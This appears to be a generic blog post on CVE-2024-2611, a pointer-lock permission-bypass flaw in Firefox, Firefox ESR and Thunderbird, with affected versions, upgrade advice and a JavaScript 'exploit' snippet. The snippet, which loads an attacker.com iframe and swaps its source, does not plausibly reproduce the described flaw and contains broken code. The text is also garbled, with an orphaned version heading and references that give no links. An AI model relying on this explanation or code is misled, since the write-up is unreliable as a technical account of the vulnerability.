CVE-2024-2611 - A Missing Delay in Pointer Lock Usage Leads to Permission Bypass Vulnerability in Firefox and Thunderbird

In today's world, keeping your online presence secure is of utmost importance. Fortunately, our browsers and email clients constantly evolve with improved security features to protect us. However, new vulnerabilities continuously emerge with new technologies.

One such vulnerability was discovered in the widely used Mozilla Firefox web browser, Firefox ESR, and Thunderbird email client (CVE-2024-2611). This post will provide a detailed explanation of this vulnerability, how an attacker could exploit it, and the affected versions. Additionally, we will share links to the original references and a code snippet for a better understanding of the issue.

The Vulnerability

CVE-2024-2611 is a security vulnerability identified in Firefox < 124, Firefox ESR < 115.9, and Thunderbird < 115.9. The issue lies in the missing delay when pointer lock is used, allowing a malicious page to trick a user into granting permissions inadvertently. It bypasses the Permission API, which provides a way for web browsers to request permission from users for access to certain functionalities.

How the Exploit Works

To exploit this vulnerability, an attacker could create a malicious webpage that requests pointer lock access from a user's browser. In this scenario, the attacker's page secretly switches context, making the user unintentionally grant permissions to an unintended object. Here's a code snippet to demonstrate the issue:

// Attacker creates a malicious page
let malicious_page = document.createElement('iframe');
malicious_page.src = 'https://attacker.com';;
document.body.appendChild(malicious_page);

// Attacker requests pointer lock
malicious_page.contentWindow.addEventListener('load', function () {
  malicious_page.contentWindow.document.body.requestPointerLock();
});

// Missing delay allows attacker to switch context
setTimeout(function () {
  malicious_page.src = 'https://trusted-page.com';;
}, 100);

Thunderbird < 115.9

For users running these versions, it is highly recommended to upgrade to the latest version to protect against this vulnerability.

Original References

1. Mozilla Foundation Official CVE Record
2. CVE-2024-2611 on MITRE's CVE List
3. Mozilla Bug Tracker

Conclusion

It is crucial to stay updated with the latest software patches and security fixes, as attackers find new ways to exploit the systems daily. CVE-2024-2611 serves as a reminder that even the most prominent web browser, email client, or application can contain unforeseen vulnerabilities that hackers can exploit.

Ensure you upgrade your Firefox, Firefox ESR, and Thunderbird applications to the latest versions or higher (Firefox ≥ 124, Firefox ESR ≥ 115.9, Thunderbird ≥ 115.9) to secure your online presence and protect yourself against this particular vulnerability. Stay safe online and keep your applications updated!

Timeline

Published on: 03/19/2024 12:15:09 UTC
Last modified on: 03/25/2024 17:15:51 UTC